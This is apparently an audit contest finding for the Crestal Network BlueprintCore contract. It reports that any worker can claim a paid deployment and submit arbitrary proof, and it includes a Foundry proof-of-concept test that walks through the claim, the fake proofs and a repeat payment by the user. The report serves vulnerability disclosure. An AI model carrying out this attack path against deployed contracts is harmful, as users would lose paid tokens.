Lively Lemonade Mouse

Medium

# Any user can lose funds through malicious worker assignment in deployment requests

### Summary

The lack of validation and protective measures in the deployment management system can cause financial loss for users as any worker can claim deployments and submit arbitrary proof, enabling loss of payment with no recourse for the user who paid for agent creation.


### Root Cause

The choice to implement an unprotected worker assignment system with upfront payment:

1. In BlueprintCore.sol the [submitDeploymentRequest](https://github.com/sherlock-audit/2025-03-crestal-network/blob/27a3c28155702b3a68f29347efedffb048010e33/crestal-omni-contracts/src/BlueprintCore.sol#L602-L606) function allows any worker to claim any pending deployment without verification or qualifications
2. The system immediately transfers user funds during agent creation before any work is performed
3. The [submitProofOfDeployment](https://github.com/sherlock-audit/2025-03-crestal-network/blob/27a3c28155702b3a68f29347efedffb048010e33/crestal-omni-contracts/src/BlueprintCore.sol#L584-L586) function accepts any arbitrary string as valid proof without validation
4. Once claimed, there is no mechanism to reassign deployments, request refunds, or dispute invalid proofs

### Internal Pre-conditions


1. A project with a valid project ID needs to exist in the system
2. The user must have created a deployment request through `createAgentWithToken` or a similar function
3. The user must have paid the required tokens, which are transferred immediately
4. The deployment request must be in `Status.Issued` state, which is the default for non-private deployments


### External Pre-conditions

No external preconditions are necessary for this attack.

### Attack Path

1. User calls `createAgentWithToken` with a token address, paying the required fee upfront
2. The deployment request is created with `Status.Issued`
3. A malicious worker monitors for new deployments and immediately calls `submitDeploymentRequest` to claim the deployment
4. The malicious worker either:
   - Does nothing, leaving the deployment permanently locked in `Status.Pickup` status
   - Calls `submitProofOfDeployment` with arbitrary invalid data that gets accepted without validation
5. The deployment now has `Status.GeneratedProof` with invalid data
6. The user has no recourse to:
   - Reassign the deployment to a legitimate worker
   - Dispute the invalid proof
   - Request a refund of their payment

Note: The deployment owner can call `updateWorkerDeploymentConfig` to reset the status back to Pickup, but this requires additional payment and keeps the deployment assigned to the same malicious worker.

### Impact


The users suffer a complete loss of paid tokens with no received value. The attacker gains control over deployments without providing legitimate service.

This vulnerability presents financial risk to users because:

1. Payments are taken upfront during agent creation and transferred immediately
2. The system lacks any escrow or conditional payment mechanism
3. There is no timeout for inactive workers or reassignment process
4. No validation of proof content allows workers to submit arbitrary data
5. No dispute resolution or refund mechanism exists in the contract

While the financial impact depends on the token cost set for agent creation, it represents a 100% loss of whatever amount the user paid, with zero value received in return.

While users can reset their deployment status by paying additional fees, they cannot reassign to a different worker. This creates a potential cycle of payments with no guarantee of receiving valid service, representing an ongoing financial drain with diminishing likelihood of value received

### PoC


Paste the following test in `BlueprintV5.t.sol` then run `forge test --match-test test_MaliciousWorkerFundLoss -vvvv`

```solidity
    function test_MaliciousWorkerFundLoss() public {
        string memory base64Proposal = "test base64 proposal";
        string memory serverURL = "app.crestal.network";
        bytes32 projectId = bytes32(0x3723a34e38d0f0aa09ce626f00aa23c0464b52c75516cf3203cc4c9afeaf2981);
        
        // Setup: Add payment token and set cost
        uint256 tokenAmount = 100 * 10 ** 18;
        blueprint.addPaymentAddress(address(mockToken));
        blueprint.setCreateAgentTokenCost(address(mockToken), tokenAmount);
        
        // Setup: Mint tokens to the user and approve blueprint to spend
        mockToken.mint(address(this), tokenAmount);
        mockToken.approve(address(blueprint), tokenAmount);
        
        // Step 1: User calls createAgentWithToken and pays tokens
        bytes32 requestId = blueprint.createAgentWithToken(
            projectId, 
            base64Proposal, 
            dummyAddress, // No private worker, so status will be Issued
            serverURL, 
            address(mockToken)
        );
        
        // Verify tokens were transferred to fee collection wallet
        uint256 userBalanceAfterPayment = mockToken.balanceOf(address(this));
        uint256 feeWalletBalance = mockToken.balanceOf(blueprint.feeCollectionWalletAddress());
        assertEq(userBalanceAfterPayment, 0, "User should have 0 tokens after payment");
        assertEq(feeWalletBalance, tokenAmount, "Fee wallet should have received tokens");
        
        // Step 2: Setup malicious worker account
        address maliciousWorker = address(0xBad);
        vm.startPrank(maliciousWorker);
        
        // Step 3: Malicious worker claims the deployment
        bool isAccepted = blueprint.submitDeploymentRequest(projectId, requestId);
        assertTrue(isAccepted, "Deployment request should be accepted");
        
        // Step 4: Check deployment status - now assigned to malicious worker
        (BlueprintCore.Status status, address workerAddr) = blueprint.requestDeploymentStatus(requestId);
        assertEq(uint(status), uint(BlueprintCore.Status.Pickup), "Status should be Pickup");
        assertEq(workerAddr, maliciousWorker, "Worker should be the malicious worker");
        
        // Step 5: Malicious worker either does nothing or submits invalid proof
        string memory fakeProof = "invalid_proof_data";
        blueprint.submitProofOfDeployment(projectId, requestId, fakeProof);
        
        // Verify proof was accepted without validation
        string memory storedProof = blueprint.getDeploymentProof(requestId);
        assertEq(storedProof, fakeProof, "Invalid proof should be stored");
        
        // Step 6: Check deployment status - now marked as completed
        (status, workerAddr) = blueprint.requestDeploymentStatus(requestId);
        assertEq(uint(status), uint(BlueprintCore.Status.GeneratedProof), "Status should be GeneratedProof");
        
        vm.stopPrank();
        
        // Step 7: User has lost funds and has no recourse
        // The user has paid tokens but received invalid work
        // There is no way to dispute the proof or get a refund
        // Note: No function exists to reset or reassign the deployment at this point
        
        // Step 8: User attempts to use updateWorkerDeploymentConfig as recourse
        // Mint more tokens for another payment
        mockToken.mint(address(this), tokenAmount);
        mockToken.approve(address(blueprint), tokenAmount);
        // Set the cost for updating the deployment config
        blueprint.setUpdateCreateAgentTokenCost(address(mockToken), tokenAmount);

        // User pays again to update config and reset status
        vm.expectEmit(true, true, true, true);
        emit BlueprintCore.UpdateDeploymentConfig(projectId, requestId, maliciousWorker, "updated_config");
        blueprint.updateWorkerDeploymentConfig(address(mockToken), projectId, requestId, "updated_config");

        // Verify tokens were transferred again
        userBalanceAfterPayment = mockToken.balanceOf(address(this));
        assertEq(userBalanceAfterPayment, 0, "User paid additional tokens for update");

        // Verify deployment status was reset but worker remained the same
        (status, workerAddr) = blueprint.requestDeploymentStatus(requestId);
        assertEq(uint(status), uint(BlueprintCore.Status.Pickup), "Status should be reset to Pickup");
        assertEq(workerAddr, maliciousWorker, "Worker should still be the malicious worker");

        // Step 9: Malicious worker can submit invalid proof again
        vm.startPrank(maliciousWorker);
        string memory anotherFakeProof = "another_invalid_proof";
        blueprint.submitProofOfDeployment(projectId, requestId, anotherFakeProof);
        vm.stopPrank();

        // Verify proof was updated
        storedProof = blueprint.getDeploymentProof(requestId);
        assertEq(storedProof, anotherFakeProof, "New invalid proof should be stored");

        // Step 10 User is stuck in a payment cycle with no guarantee of service
    }
```


### Mitigation

_No response_